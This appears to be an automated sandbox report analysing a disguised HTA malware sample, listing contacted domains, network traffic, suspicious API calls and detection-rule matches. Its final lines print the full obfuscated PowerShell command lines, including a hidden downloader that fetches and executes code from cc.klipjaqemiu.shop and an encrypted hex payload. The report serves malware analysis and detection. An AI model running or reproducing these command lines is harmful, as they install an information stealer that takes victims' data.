              Source: powershell.exe, 00000002.00000002.1700290023.0000000004571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cc.klipjaqemiu.shop
              Source: powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2423169507.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cc.klipjaqemiu.shop/web.png
              Source: powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1698936708.00000000004E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mic
              Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2888738105.0000000003688000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2889805623.0000000005931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://noisercluch.click/
              Source: powershell.exe, 00000009.00000002.2888448728.0000000003675000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2885773089.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://noisercluch.click/api
              Source: powershell.exe, 00000009.00000002.2885773089.00000000035DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://noisercluch.click/api8)
              Source: powershell.exe, 00000009.00000002.2888448728.0000000003675000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://noisercluch.click/api=
              Source: powershell.exe, 00000002.00000002.1704375410.00000000055D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49849 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49855 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49865 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49871 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49881 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49888 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49899 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49918 version: TLS 1.2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00431B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,9_2_00431B10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_05701000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,9_2_05701000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00431B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,9_2_00431B10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00431D10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,9_2_00431D10

              System Summary

              barindex
              Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C1F508 NtResumeThread,4_2_06C1F508
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C1F500 NtResumeThread,4_2_06C1F500
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_008E28984_2_008E2898
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_008E28A84_2_008E28A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_008E1F084_2_008E1F08
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_008E1F184_2_008E1F18
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BD33704_2_06BD3370
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BD36A74_2_06BD36A7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BD00064_2_06BD0006
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BD49884_2_06BD4988
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BE2E584_2_06BE2E58
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BEFA334_2_06BEFA33
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06BEFA404_2_06BEFA40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C0B7904_2_06C0B790
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C0B7384_2_06C0B738
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C071DB4_2_06C071DB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C0E6F84_2_06C0E6F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C0B77F4_2_06C0B77F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C035D14_2_06C035D1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C035E04_2_06C035E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C000404_2_06C00040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C058684_2_06C05868
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C058784_2_06C05878
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C000074_2_06C00007
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C169804_2_06C16980
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C18D454_2_06C18D45
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C18D504_2_06C18D50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C19A8F4_2_06C19A8F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C19A904_2_06C19A90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C1697F4_2_06C1697F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C47B484_2_06C47B48
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C47B394_2_06C47B39
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C400404_2_06C40040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C400064_2_06C40006
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C480184_2_06C48018
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C480284_2_06C48028
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C461504_2_06C46150
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C461604_2_06C46160
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C60CD04_2_06C60CD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06C60CE04_2_06C60CE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043A0D09_2_0043A0D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004368A09_2_004368A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004262309_2_00426230
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0040D35C9_2_0040D35C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00436BF09_2_00436BF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0040E4659_2_0040E465
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004215509_2_00421550
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004156409_2_00415640
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0042BF459_2_0042BF45
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00410F719_2_00410F71
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004087209_2_00408720
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041D8409_2_0041D840
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041A8009_2_0041A800
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043A8009_2_0043A800
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043B8139_2_0043B813
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004198209_2_00419820
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041683F9_2_0041683F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043483C9_2_0043483C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004220C09_2_004220C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004380C59_2_004380C5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004460D59_2_004460D5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004230E09_2_004230E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004270F99_2_004270F9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004180959_2_00418095
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0042C8949_2_0042C894
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043D1409_2_0043D140
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0040B14F9_2_0040B14F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004039609_2_00403960
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004059709_2_00405970
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0040C97C9_2_0040C97C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004351359_2_00435135
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004061D09_2_004061D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0042C9DA9_2_0042C9DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0042C9E99_2_0042C9E9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043E1F09_2_0043E1F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0042C9849_2_0042C984
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004259B09_2_004259B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00427A409_2_00427A40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043D2409_2_0043D240
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00414A509_2_00414A50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041C2059_2_0041C205
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041720B9_2_0041720B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00408A209_2_00408A20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041E2309_2_0041E230
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041AAE09_2_0041AAE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0042C2899_2_0042C289
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004092909_2_00409290
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00411A949_2_00411A94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0040F2A09_2_0040F2A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00417B759_2_00417B75
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004043109_2_00404310
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00431B109_2_00431B10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0040AB209_2_0040AB20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043D3209_2_0043D320
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0042A3B09_2_0042A3B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043D3B09_2_0043D3B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043DBB09_2_0043DBB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004074409_2_00407440
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00428C469_2_00428C46
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00404C509_2_00404C50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041DC509_2_0041DC50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043D4509_2_0043D450
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00423C609_2_00423C60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004164E09_2_004164E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004374F09_2_004374F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043E5409_2_0043E540
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041D5609_2_0041D560
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00421D109_2_00421D10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043A5109_2_0043A510
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00427D949_2_00427D94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004256409_2_00425640
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004066609_2_00406660
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004196059_2_00419605
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004266C09_2_004266C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0042FEC09_2_0042FEC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004226D39_2_004226D3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00437EA09_2_00437EA0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0043DEB09_2_0043DEB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00402F409_2_00402F40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041F7009_2_0041F700
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004097109_2_00409710
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0041DFC09_2_0041DFC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0042DFC39_2_0042DFC3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00435FF09_2_00435FF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004377909_2_00437790
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00414A40 appears 63 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00407FF0 appears 45 times
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3122
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3122Jump to behavior
              Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@9/6@2/1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00436BF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,9_2_00436BF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4nnbc5p.qqi.ps1Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\web44.mp4.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
